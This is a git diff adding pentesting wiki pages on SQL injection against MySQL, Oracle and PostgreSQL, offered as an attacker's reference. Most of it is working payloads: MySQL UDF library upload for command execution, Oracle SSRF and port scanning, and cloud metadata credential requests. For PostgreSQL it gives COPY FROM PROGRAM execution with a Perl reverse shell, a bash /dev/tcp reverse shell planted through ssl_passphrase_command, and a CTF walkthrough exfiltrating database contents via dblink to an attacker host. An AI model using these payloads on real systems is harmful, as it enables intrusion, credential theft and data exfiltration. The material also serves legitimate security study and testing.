+You could also [create your own UDF and use that for post exploitation as well.](https://pure.security/simple-mysql-backdoor-using-user-defined-functions/)
+
+In any case, you need to transfer the library to the database server. You can do this in multiple ways
+
+1. Use the MySQL `hex()` string function or something like `xxd -p filename.so | tr -d '\n'` to convert the contents of the library to hex format and then dumping it to the `@@plugin_dir` directory using `x'; SELECT unhex(0x1234abcd12abcdef1223.....) into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys.so' -- //`
+2. Alternatively, convert the contents of `filename.so` to base64 and use `x';select from_base64("AAAABB....") into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys.so' -- //`
+
+If the `@@plugin_dir` is not writable, then you are out of luck if the version is above `v5.0.67`. Otherwise, write to a different location that is in path and load the UDF library from there using
+
+* for the `lib_mysqludf_sys` library - `x';create function sys_eval returns string soname 'lib_mysqludf_sys.so'; -- //`
+* for the `mysql-udf-http` library - `x';create function http_get returns string soname 'mysql-udf-http.so'; -- //`
+
+![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/4.png)![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/5.png)
+
+For automating this, you can use SQLMap which supports [the usage of custom UDF via the `--udf-inject` option](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+For Blind SQL Injections you could redirect output of the UDF functions to a temporay table and then read the data from there or use [DNS request smuggled inside a `sys_eval` or `sys_exec` curl command](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration).
+
diff --git a/pentesting-web/sql-injection/oracle-injection.md b/pentesting-web/sql-injection/oracle-injection.md
new file mode 100644
index 00000000..acd45bbb
--- /dev/null
+++ b/pentesting-web/sql-injection/oracle-injection.md
@@ -0,0 +1,172 @@
+# Oracle injection
+
+## SSRF
+
+**Information copied from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/\#oracle**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#oracle)\*\*\*\*
+
+Using Oracle to do Out of Band HTTP and DNS requests is well documented but as a means of exfiltrating SQL data in injections. We can always modify these techniques/functions to do other SSRF/XSPA.
+
+Installing Oracle can be really painful, especially if you want to set up a quick instance to try out commands. My friend and colleague at [Appsecco](https://appsecco.com/), [Abhisek Datta](https://github.com/abhisek), pointed me to [https://github.com/MaksymBilenko/docker-oracle-12c](https://github.com/MaksymBilenko/docker-oracle-12c) that allowed me to setup an instance on a t2.large AWS Ubuntu machine and Docker.
+
+I ran the docker command with the `--network="host"` flag so that I could mimic Oracle as an native install with full network access, for the course of this blogpost.
+
+```text
+docker run -d --network="host" quay.io/maksymbilenko/oracle-12c 
+```
+
+#### Oracle packages that support a URL or a Hostname/Port Number specification <a id="oracle-packages-that-support-a-url-or-a-hostname-port-number-specification"></a>
+
+In order to find any packages and functions that support a host and port specification, I ran a Google search on the [Oracle Database Online Documentation](https://docs.oracle.com/database/121/index.html). Specifically,
+
+```text
+site:docs.oracle.com inurl:"/database/121/ARPLS" "host"|"hostname" "port"|"portnum"
+```
+
+The search returned the following results \(not all can be used to perform outbound network\)
+
+* DBMS\_NETWORK\_ACL\_ADMIN
+* UTL\_SMTP
+* DBMS\_XDB
+* DBMS\_SCHEDULER
+* DBMS\_XDB\_CONFIG
+* DBMS\_AQ
+* UTL\_MAIL
+* DBMS\_AQELM
+* DBMS\_NETWORK\_ACL\_UTILITY
+* DBMS\_MGD\_ID\_UTL
+* UTL\_TCP
+* DBMS\_MGWADM
+* DBMS\_STREAMS\_ADM
+* UTL\_HTTP
+
+This crude search obviously skips packages like `DBMS_LDAP` \(which allows passing a hostname and port number\) as [the documentation page](https://docs.oracle.com/database/121/ARPLS/d_ldap.htm#ARPLS360) simply points you to a [different location](https://docs.oracle.com/database/121/ARPLS/d_ldap.htm#ARPLS360). Hence, there may be other Oracle packages that can be abused to make outbound requests that I may have missed.
+
+In any case, let’s take a look at some of the packages that we have discovered and listed above.
+
+**DBMS\_LDAP.INIT**
+
+The `DBMS_LDAP` package allows for access of data from LDAP servers. The `init()` function initializes a session with an LDAP server and takes a hostname and port number as an argument.
+
+This function has been documented before to show exfiltration of data over DNS, like below
+
+```text
+SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(select name from V$database)||'.'||'d4iqio0n80d5j4yg7mpu6oeif9l09p.burpcollaborator.net',80) FROM dual;
+```
+
+However, given that the function accepts a hostname and a port number as arguments, you can use this to work like a port scanner as well.
+
+Here are a few examples
+
+```text
+SELECT DBMS_LDAP.INIT('scanme.nmap.org',22) FROM dual;
+SELECT DBMS_LDAP.INIT('scanme.nmap.org',25) FROM dual;
+SELECT DBMS_LDAP.INIT('scanme.nmap.org',80) FROM dual;
+SELECT DBMS_LDAP.INIT('scanme.nmap.org',8080) FROM dual;
+```
+
+![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/18.png)
+
+A `ORA-31203: DBMS_LDAP: PL/SQL - Init Failed.` shows that the port is closed while a session value points to the port being open.
+
+**UTL\_SMTP**
+
+The `UTL_SMTP` package is designed for sending e-mails over SMTP. The example provided on the [Oracle documentation site shows how you can use this package to send an email](https://docs.oracle.com/database/121/ARPLS/u_smtp.htm#ARPLS71478). For us, however, the interesting thing is with the ability to provide a host and port specification.
+
+A crude example is shown below with the `UTL_SMTP.OPEN_CONNECTION` function, with a timeout of 2 seconds
+
+```text
+DECLARE c utl_smtp.connection;
+BEGIN
+c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',80,2);
+END;
+```
+
+```text
+DECLARE c utl_smtp.connection;
+BEGIN
+c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',8080,2);
+END;
+```
+
+![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/19.png)
+
+A `ORA-29276: transfer timeout` shows port is open but no SMTP connection was estabilished while a `ORA-29278: SMTP transient error: 421 Service not available` shows that the port is closed.
+
+**UTL\_TCP**
+
+The `UTL_TCP` package and its procedures and functions allow [TCP/IP based communication with services](https://docs.oracle.com/cd/B28359_01/appdev.111/b28419/u_tcp.htm#i1004190). If programmed for a specific service, this package can easily become a way into the network or perform full Server Side Requests as all aspects of a TCP/IP connection can be controlled.
+
+The example [on the Oracle documentation site shows how you can use this package to make a raw TCP connection to fetch a web page](https://docs.oracle.com/cd/B28359_01/appdev.111/b28419/u_tcp.htm#i1004190). We can simply it a little more and use it to make requests to the metadata instance for example or to an arbitrary TCP/IP service.
+
+```text
+set serveroutput on size 30000;
+SET SERVEROUTPUT ON 
+DECLARE c utl_tcp.connection;
+  retval pls_integer; 
+BEGIN
+  c := utl_tcp.open_connection('169.254.169.254',80,tx_timeout => 2);
+  retval := utl_tcp.write_line(c, 'GET /latest/meta-data/ HTTP/1.0');
+  retval := utl_tcp.write_line(c);
+  BEGIN
+    LOOP
+      dbms_output.put_line(utl_tcp.get_line(c, TRUE));
+    END LOOP;
+  EXCEPTION
+    WHEN utl_tcp.end_of_input THEN
+      NULL;
+  END;
+  utl_tcp.close_connection(c);
+END;
+/
+```
+
+![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/20.png)
+
+```text
+DECLARE c utl_tcp.connection;
+  retval pls_integer; 
+BEGIN
+  c := utl_tcp.open_connection('scanme.nmap.org',22,tx_timeout => 4);
+  retval := utl_tcp.write_line(c);
+  BEGIN
+    LOOP
+      dbms_output.put_line(utl_tcp.get_line(c, TRUE));
+    END LOOP;
+  EXCEPTION
+    WHEN utl_tcp.end_of_input THEN
+      NULL;
+  END;
+  utl_tcp.close_connection(c);
+END;
+```
+
+![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/21.png)
+
+Interestingly, due to the ability to craft raw TCP requests, this package can also be used to query the Instance meta-data service of all cloud providers as the method type and additional headers can all be passed within the TCP request.
+
+**UTL\_HTTP and Web Requests**
+
+Perhaps the most common and widely documented technique in every Out of Band Oracle SQL Injection tutorial out there is the [`UTL_HTTP` package](https://docs.oracle.com/database/121/ARPLS/u_http.htm#ARPLS070). This package is defined by the documentation as - `The UTL_HTTP package makes Hypertext Transfer Protocol (HTTP) callouts from SQL and PL/SQL. You can use it to access data on the Internet over HTTP.`
+
+```text
+select UTL_HTTP.request('http://169.254.169.254/latest/meta-data/iam/security-credentials/adminrole') from dual;
+```
+
+![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/16.png)
+
+You could additionally, use this to perform some rudimentary port scanning as well with queries like
+
+```text
+select UTL_HTTP.request('http://scanme.nmap.org:22') from dual;
+select UTL_HTTP.request('http://scanme.nmap.org:8080') from dual;
+select UTL_HTTP.request('http://scanme.nmap.org:25') from dual;
+```
+
+![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/17.png)
+
+A `ORA-12541: TNS:no listener` or a `TNS:operation timed out` is a sign that the TCP port is closed, whereas a `ORA-29263: HTTP protocol error` or data is a sign that the port is open.
+
+Another package I have used in the past with varied success is the [`GETCLOB()` method of the `HTTPURITYPE` Oracle abstract type](https://docs.oracle.com/database/121/ARPLS/t_dburi.htm#ARPLS71705) that allows you to interact with a URL and provides support for the HTTP protocol. The `GETCLOB()` method is used to fetch the GET response from a URL as a [CLOB data type.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[select HTTPURITYPE\('http://169.254.169.254/latest/meta-data/instance-id'\).getclob\(\) from dual;![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/22.png)](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)
+
+
+
diff --git a/pentesting-web/sql-injection/postgresql-injection/README.md b/pentesting-web/sql-injection/postgresql-injection/README.md
new file mode 100644
index 00000000..bf5f3052
--- /dev/null
+++ b/pentesting-web/sql-injection/postgresql-injection/README.md
@@ -0,0 +1,149 @@
+# PostgreSQL injection
+
+**This page aims to explain different tricks that could help you to exploit a SQLinjection found in a postgresql database and to compliment the tricks you can find on** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)\*\*\*\*
+
+## Network Interaction - Privilege Escalation, Port Scanner, NTLM challenge response disclosure & Exfiltration
+
+**`dblink`** is a **PostgreSQL module** that offers several interesting options from the attacker point of view. It can be used to **connect to other PostgreSQL instances** of perform **TCP connections**.  
+**These functionalities** along with the **`COPY FROM`** functionality can be used to **escalate privileges**, perform **port scanning** or grab **NTLM challenge responses**.  
+[**You can read here how to perform these attacked.**](network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md)\*\*\*\*
+
+### **Exfiltration example using dblink and large objects**
+
+You can [**read this example**](dblink-lo_import-data-exfiltration.md) ****to see a CTF example of **how to load data inside large objects and then exfiltrate the content of large objects inside the username** of the function `dblink_connect`.
+
+## PL/pgSQL password bruteforce
+
+PL/pgSQL, as a **fully featured programming language**, allows much more procedural control than SQL, including the **ability to use loops and other control structures**. SQL statements and triggers can call functions created in the PL/pgSQL language.  
+**You can abuse this language in order to ask PostgreSQL to brute-force the users credentials.** [**Read this to learn how.**](pl-pgsql-password-bruteforce.md)\*\*\*\*
+
+## File-system actions
+
+### Read directories and files
+
+From this [commit ](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a)members of the `DEFAULT_ROLE_READ_SERVER_FILES` group and super users can use these methods on any path \(check out `convert_and_check_filename` in `genfile.c`\).:
+
+```sql
+select * from pg_ls_dir('/tmp');
+select * from pg_read_file('/etc/passwd' , 0 , 1000000);
+```
+
+### Simple File Writing
+
+```bash
+copy (select convert_from(decode('<ENCODED_PAYLOAD>','base64'),'utf-8')) to '/just/a/path.exec';
+```
+
+Remember that COPY cannot handle newline chars, therefore even if you are using a base64 payload y**ou need to send a one-liner**.  
+A very important limitation of this technique is that **`copy` cannot be used to write binary files as it modify some binary values.**
+
+### **Binary files upload**
+
+However, there are **other techniques to upload big binary files**.  
+[**Read this page to learn how to do it.**](big-binary-files-upload-postgresql.md)\*\*\*\*
+
+## RCE 
+
+### CVE-2019–9193 **RCE from version 9.3 to 11.2**
+
+Since[ version 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html), new functionality for '[COPY TO/FROM PROGRAM](https://paquier.xyz/postgresql-2/postgres-9-3-feature-highlight-copy-tofrom-program/)' was implemented. This allows the database superuser, and any user in the ‘pg\_execute\_server\_program’ group to run arbitrary operating system commands.
+
+```bash
+#PoC
+DROP TABLE IF EXISTS cmd_exec;
+CREATE TABLE cmd_exec(cmd_output text);
+COPY cmd_exec FROM PROGRAM 'id';
+SELECT * FROM cmd_exec;
+DROP TABLE IF EXISTS cmd_exec;
+
+#Reverse shell
+#Notice that in order to scape a single quote you need to put 2 single quotes
+COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
+```
+
+Or use the `multi/postgres/postgres_copy_from_program_cmd_exec` module from **metasploit**.  
+More information about this vulnerability [**here**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5).
+
+### RCE with PostgreSQL extensions
+
+Once you have **learned** from the previous post **how to upload binary files** you could try obtain **RCE uploading a postgresql extension and loading it**.  
+[**Lear how to abuse this functionality reading this post.**](rce-with-postgresql-extensions.md)\*\*\*\*
+
+### PostgreSQL configuration file RCE
+
+The **configuration file** of postgresql is **writable** by the **postgres user** which is the one running the database, so as **superuser** you can write files in the filesystem, and therefore you can **overwrite this file.**
+
+![](../../../.gitbook/assets/image%20%28232%29.png)
+
+The configuration file have some interesting attributes that can lead to RCE:
+
+* `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` Path to the private key of the database
+* `ssl_passphrase_command = ''` If the private file is protected by password \(encrypted\) postgresql will **execute the command indicated in this attribute**.
+* `ssl_passphrase_command_supports_reload = off` **If** this attribute is **on** the **command** executed if the key is protected by password **will be executed** when `pg_reload_conf()` is **executed**.
+
+Then, an attacker will need to:
+
+1. **Dump private key** from the server
+2. **Encrypt** downloaded private key:
+   1. `rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key`
+3. **Overwrite** 
+4. **Dump** the current postgresql **configuration**
+5. **Overwrite** the **configuration** with the mentioned attributes configuration:
+   1. `ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'`
+   2. `ssl_passphrase_command_supports_reload = on`
+6. Execute `pg_reload_conf()`
+
+While testing this I noticed that this will only work if the **private key file has privileges 640**, it's **owned by root** and by the **group ssl-cert or postgres** \(so the postgres user can read it\), and is placed in _/var/lib/postgresql/12/main_.
+
+**More** [**information about this technique here**](https://pulsesecurity.co.nz/articles/postgres-sqli)**.**
+
+## WAF bypass
+
+### PostgreSQL String functions
+
+Manipulating strings could help you to **bypass WAFs or other restrictions**.  
+[**In this page** ](https://www.postgresqltutorial.com/postgresql-string-functions/)**you can find some useful Strings functions.**
+
+### Stacked Queries
+
+Remember that postgresql support stacked queries, but several application will throw an error if 2 responses are returned when expecting just 1. But, you can still abuse the stacked queries via Time injection:
+
+```text
+id=1; select pg_sleep(10);-- -
+1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -
+```
+
+### XML tricks
+
+#### query\_to\_xml
+
+This function will return all the data in XML format in just one file. It's ideal if you want to dump a lot of data in just 1 row:
+
+```sql
+SELECT query_to_xml('select * from pg_user',true,true,'');
+```
+
+#### database\_to\_xml
+
+This function will dump the whole database in XML format in just 1 row \(be careful if the database is very big as you may DoS it or even your own client\):
+
+```sql
+SELECT database_to_xml(true,true,'');
+```
+
+### Forbidden quotes
+
+If cannot use quotes for your payload you could bypass this with `CHR` for basic clauses \(_character concatenation only works for basic queries such as SELECT, INSERT, DELETE, etc. It does not work for all SQL statements_\):
+
+```text
+SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
+```
+
+Or with `$`. This queries return the same results:
+
+```text
+SELECT 'hacktricks';
+SELECT $$hacktricks$$;
+SELECT $TAG$hacktricks$TAG$;
+```
+
diff --git a/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md b/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
new file mode 100644
index 00000000..094c788e
--- /dev/null
+++ b/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
@@ -0,0 +1,108 @@
+# Big Binary Files Upload \(PostgreSQL\)
+
+## PostgreSQL Large Objects
+
+PostgreSQL exposes a structure called **large object \(**`pg_largeobject`  table\), which is used for storing data that would be difficult to handle in its entirety \(like an image or a PDF document\). As opposed to the `COPY TO` function, the advantage of **large objects** lies in the fact that the **data** they **hold** can be **exported back** to the **file system** as an **identical copy of the original imported file**.
+
+In order to **save a complete file inside this table** you first need to **create an object** inside the mentioned table \(identified by a **LOID**\) and then **insert chunks of 2KB** inside this object. It's very important that all the **chunks have 2KB** \(except possible the last one\) **or** the **exporting** function to the file system **won't work**.
+
+In order to **split** your **binary** in **chunks** of size **2KB** you can do:
+
+```bash
+split -b 2048 pg_exec.so #This will create files of size 2KB
+```
+
+In order to encode each of the files created to Base64 or Hex you can use:
+
+```bash
+base64 -w 0 <Chunk_file> #Encoded in 1 line
+xxd -ps -c 99999999999 <Chunk_file> #Encoded in 1 line
+```
+
+{% hint style="info" %}
+When exploiting this remember that you have to send **chunks of 2KB clear-text bytes** \(not 2KB of base64 or hex encoded bytes\). If you try to automate this, the size of a **hex encoded** file is the **double** \(then you need to send 4KB of encoded data for each chunk\) and the size of a **base64** encoded file is `ceil(n / 3) * 4`
+{% endhint %}
+
+Also, debugging the process you can see the contents of the large objects created with:
+
+```sql
+ select loid, pageno, encode(data, 'escape') from pg_largeobject;
+```
+
+## Using lo\_creat & Base64
+
+First, we need to create a LOID where the binary data is going to be saved:
+
+```sql
+SELECT lo_creat(-1);       -- returns OID of new, empty large object
+SELECT lo_create(173454);   -- attempts to create large object with OID 43213
+```
+
+If you are abusing a **Blind SQLinjection** you will be more interested on using `lo_create` with a **fixed LOID** so you **know where** you have to **upload** the **content**.  
+Also, note that there is no syntax error the functions are `lo_creat` and `lo_create`.
+
+LOID is used to identify the object in the `pg_largeobjec`t table. Inserting chunks of size 2KB into the `pg_largeobject` table can be achieved using:
+
+```sql
+INSERT INTO pg_largeobject (loid, pageno, data) values (173454, 0, decode('<B64 chunk1>', 'base64'));
+INSERT INTO pg_largeobject (loid, pageno, data) values (173454, 1, decode('<B64 chunk2>', 'base64'));
+INSERT INTO pg_largeobject (loid, pageno, data) values (173454, 3, decode('<B64 chunk2>', 'base64'));
+```
+
+Finally you can export the file to the file-system doing \(during this example the LOID used was `173454`\):
+
+```sql
+SELECT lo_export(173454, '/tmp/pg_exec.so');
+```
+
+{% hint style="info" %}
+Note the in newest versions of postgres you may need to **upload the extensions without indicating any path** at all. [**Read this for more information**.](rce-with-postgresql-extensions.md#rce-in-newest-prostgres-versions)
+{% endhint %}
+
+You possible may be interested in delete the large object created after exporting it:
+
+```sql
+SELECT lo_unlink(173454);  -- deletes large object with OID 173454
+```
+
+## Using lo\_import & Hex
+
+In this scenario lo\_import is going to be used to create a large object object. Fortunately in this case you can \(and cannot\) specify the LOID you would want to use:
+
+```sql
+select lo_import('C:\\Windows\\System32\\drivers\\etc\\hosts');
+select lo_import('C:\\Windows\\System32\\drivers\\etc\\hosts', 173454);
+```
+
+After creating the object you can start inserting the data on each page \(remember, you have to insert chunks of 2KB\):
+
+```sql
+update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=0;
+update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=1;
+update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=2;
+update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=3;
+```
+
+The HEX must be just the hex \(without `0x` or `\x`\), example: 
+
+```sql
+update pg_largeobject set data=decode('68656c6c6f', 'hex') where loid=173454 and pageno=0;
+```
+
+Finally, export the data to a file and delete the large object:
+
+```sql
+ select lo_export(173454, 'C:\\path\to\pg_extension.dll');
+ select lo_unlink(173454);  -- deletes large object with OID 173454
+```
+
+{% hint style="info" %}
+Note the in newest versions of postgres you may need to **upload the extensions without indicating any path** at all. [**Read this for more information**.](rce-with-postgresql-extensions.md#rce-in-newest-prostgres-versions)
+{% endhint %}
+
+## Limitations
+
+After reading the documentation of large objects in PostgreSQL, we can find out that **large objects can has ACL** \(Access Control List\). It's possible to configure **new large objects** so your user **don't have enough privileges** to read them even if they were created by your user.
+
+However, there may be **old object with an ACL that allows current user to read it**, then we can exfiltrate that object's content.
+
diff --git a/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md b/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
new file mode 100644
index 00000000..ce9bbdca
--- /dev/null
+++ b/pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md
@@ -0,0 +1,166 @@
+# dblink/lo\_import data exfiltration
+
+**This is an example of how to exfiltrate data loading files in the database with `lo_import` and exfiltrate them using `dblink_connect`.**
+
+## **Preparing the exfiltration server/**Asynchronous SQL Injection
+
+**Extracted from:** [**https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md**](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)\*\*\*\*
+
+Because the `pg_sleep` also doesn't cause delay, we can safely assume if query execution occurs in the background or asynchronously.
+
+Normally, `dblink_connect` can be used to open a persistent connection to a remote PostgreSQL database \(e.g. `SELECT dblink_connect('host=HOST user=USER password=PASSWORD dbname=DBNAME')`\). Because we can control the parameter of this function, we can perform SQL Server Side Request Forgery to our own host. That means, we can perform Out-of-Band SQL Injection to exfiltrate data from SQL query results. At least, there are two ways to do this:
+
+1. Set up a **DNS server** and then trigger the connection to `[data].our.domain` so that we can see the data in the log or in the DNS network packets.
+2. Set up a **public PostgreSQL server, monitor the incoming network packets to PostgreSQL port**, and then trigger a connection to our host with exfiltrated data as `user`/`dbname`. By **default**, PostgreSQL doesn't use SSL for communication so we can see `user`/`dbname` as a **plain-text** on the network.
+
+The **second method is easier** because we don't need any domain. We only need to set up a server with a public IP, install PostgreSQL, set the PostgreSQL service to listen to \*/0.0.0.0, and run a network dumper \(e.g. tcpdump\) to monitor traffic to the PostgreSQL port \(5432 by default\).
+
+To set PostgreSQL so that it will **listen to the public**, set `listen_addresses` in `postgresql.conf` to `*`.
+
+```text
+listen_addresses = '*'
+```
+
+To monitor incoming traffic, run `tcpdump` to monitor port 5432.
+
+```text
+sudo tcpdump -nX -i eth0 port 5432
+```
+
+To see if we get a connection from the target, we can try using this query:
+
+```text
+asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=farisv password=postgres dbname=hellofromfb')) --
+```
+
+If successful, we get a piece of network packet with readable `user` and `dbname`.
+
+```text
+17:14:11.267060 IP [54.185.163.254.50968] > [REDACTED]: Flags [P.], seq 1:43, ack 1, win 229, options [nop,nop,TS val 970078525 ecr 958693110], length 42
+    0x0000:  4500 005e 9417 4000 2706 248c 36b9 a3fe  E..^..@.'.$.6...
+    0x0010:  9de6 2259 c718 2061 5889 142a 9f8a cb5d  .."Y...aX..*...]
+    0x0020:  8018 00e5 1701 0000 0101 080a 39d2 393d  ............9.9=
+    0x0030:  3924 7ef6 0000 002a 0003 0000 7573 6572  9$~....*....user
+    0x0040:  0066 6172 6973 7600 6461 7461 6261 7365  .farisv.database
+    0x0050:  0068 656c 6c6f 6672 6f6d 6662 0000       .hellofromfb.
+```
+
+Then, we can **continue to extract the database using several PostgreSQL queries**. Note that for each query result that contains whitespaces, we need to convert the result to **hex/base64** with `encode` function or replace the whitespace to other character with `replace` function because it will cause an execution error during `dblink_connect` process.
+
+Get a **list** of **schemas**:
+
+```text
+asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(schema_name,':') FROM information_schema.schemata) || ' password=postgres dbname=postgres')) --
+```
+
+```text
+17:36:46.538178 IP 54.185.163.254.51018 > [REDACTED]: Flags [P.], seq 1:70, ack 1, win 229, options [nop,nop,TS val 971433789 ecr 960048322], length 69
+    0x0000:  4500 0079 ecd5 4000 2706 cbb2 36b9 a3fe  E..y..@.'...6...
+    0x0010:  9de6 2259 c74a 2061 1e74 4769 b404 803d  .."Y.J.a.tGi...=
+    0x0020:  8018 00e5 2710 0000 0101 080a 39e6 e73d  ....'.......9..=
+    0x0030:  3939 2cc2 0000 0045 0003 0000 7573 6572  99,....E....user
+    0x0040:  0070 7562 6c69 633a 696e 666f 726d 6174  .public:informat
+    0x0050:  696f 6e5f 7363 6865 6d61 3a70 675f 6361  ion_schema:pg_ca
+    0x0060:  7461 6c6f 6700 6461 7461 6261 7365 0070  talog.database.p
+    0x0070:  6f73 7467 7265 7300 00                   ostgres.
+```
+
+Get a **list** of **tables** in current schema:
+
+```text
+asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(tablename, ':') FROM pg_catalog.pg_tables WHERE schemaname=current_schema()) || ' password=postgres dbname=postgres')) --
+```
+
+```text
+17:38:30.515438 IP 54.185.163.254.51026 > [REDACTED]: Flags [P.], seq 1:42, ack 1, win 229, options [nop,nop,TS val 971537775 ecr 960152304], length 41
+    0x0000:  4500 005d f371 4000 2706 c532 36b9 a3fe  E..].q@.'..26...
+    0x0010:  9de6 2259 c752 2061 8dd4 e226 24a3 a5c5  .."Y.R.a...&$...
+    0x0020:  8018 00e5 fe2b 0000 0101 080a 39e8 7d6f  .....+......9.}o
+    0x0030:  393a c2f0 0000 0029 0003 0000 7573 6572  9:.....)....user
+    0x0040:  0073 6561 7263 6865 7300 6461 7461 6261  .searches.databa
+    0x0050:  7365 0070 6f73 7467 7265 7300 00         se.postgres.
+```
+
+**Count** the **rows** in `searches` table.
+
+```text
+asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT COUNT(*) FROM searches) || ' password=postgres dbname=postgres')) --
+```
+
+```text
+17:42:39.511643 IP 54.185.163.254.51034 > [REDACTED]: Flags [P.], seq 1:35, ack 1, win 229, options [nop,nop,TS val 971786760 ecr 960401280], length 34
+    0x0000:  4500 0056 7982 4000 2706 3f29 36b9 a3fe  E..Vy.@.'.?)6...
+    0x0010:  9de6 2259 c75a 2061 5ec0 7df0 8611 357d  .."Y.Z.a^.}...5}
+    0x0020:  8018 00e5 f855 0000 0101 080a 39ec 4a08  .....U......9.J.
+    0x0030:  393e 8f80 0000 0022 0003 0000 7573 6572  9>....."....user
+    0x0040:  0030 0064 6174 6162 6173 6500 706f 7374  .0.database.post
+    0x0050:  6772 6573 0000                           gres.
+```
+
+It looks like it only has one empty table in the current schema and the flag is not in the database. We may really need to exfiltrate data from `/var/lib/postgresql/data/secret`. Unfortunately, if we try to use `pg_read_file` or `pg_read_binary_file` to read the file, we will not get an incoming connection so that the current user may not have permission to use these functions.
+
+#### More info of asynchronous SQLInjection with postdresql
+
+* [https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)
+
+## **Exfiltrating large object contents**
+
+It's possible to read file using large objects \([https://www.postgresql.org/docs/11/lo-funcs.html](https://www.postgresql.org/docs/11/lo-funcs.html)\). We can use `lo_import` to load the contents of the file into the `pg_largeobject` catalog. If the query is success, we will get the object's `oid`.
+
+```text
+asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT lo_import('/var/lib/postgresql/data/secret')) || ' password=postgres dbname=postgres')) --
+```
+
+```text
+17:54:51.963925 IP 54.185.163.254.51046 > [REDACTED]: Flags [P.], seq 1:39, ack 1, win 229, options [nop,nop,TS val 972519214 ecr 961133706], length 38
+    0x0000:  4500 005a 071f 4000 2706 b188 36b9 a3fe  E..Z..@.'...6...
+    0x0010:  9de6 2259 c766 2061 26fb c8a7 bbb3 fe01  .."Y.f.a&.......
+    0x0020:  8018 00e5 2272 0000 0101 080a 39f7 772e  ...."r......9.w.
+    0x0030:  3949 bc8a 0000 0026 0003 0000 7573 6572  9I.....&....user
+    0x0040:  0032 3436 3638 0064 6174 6162 6173 6500  .24668.database.
+    0x0050:  706f 7374 6772 6573 0000                 postgres..
+```
+
+We got 24668 as `oid` so that means we can use `lo_import` function. Unfortunately, we won't get any results if we try to get the content of large object using `lo_get(24668)` or directly access the `pg_largeobject` catalog. **It looks like the current user doesn't have permission to read the content of new objects.**
+
+After reading the documentation of large objects in PostgreSQL, we can find out that **large objects can has ACL** \(Access Control List\). That means, if there is an old object with an ACL that allows current user to read it, then we can exfiltrate that object's content.
+
+We can get a list of available large object's `oid` by extracting from `pg_largeobject_metadata`.
+
+```text
+asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT string_agg(cast(l.oid as text), ':') FROM pg_largeobject_metadata l) || ' password=postgres dbname=postgres')) --
+```
+
+```text
+18:06:57.172285 IP 54.185.163.254.51052 > [REDACTED]: Flags [.], seq 1:2897, ack 1, win 229, options [nop,nop,TS val 973244413 ecr 961858878], length 2896
+    0x0000:  4500 0b84 7adf 4000 2606 339e 36b9 a3fe  E...z.@.&.3.6...
+    0x0010:  9de6 2259 c76c 2061 8d76 e934 10c9 3972  .."Y.l.a.v.4..9r
+    0x0020:  8010 00e5 a66d 0000 0101 080a 3a02 87fd  .....m......:...
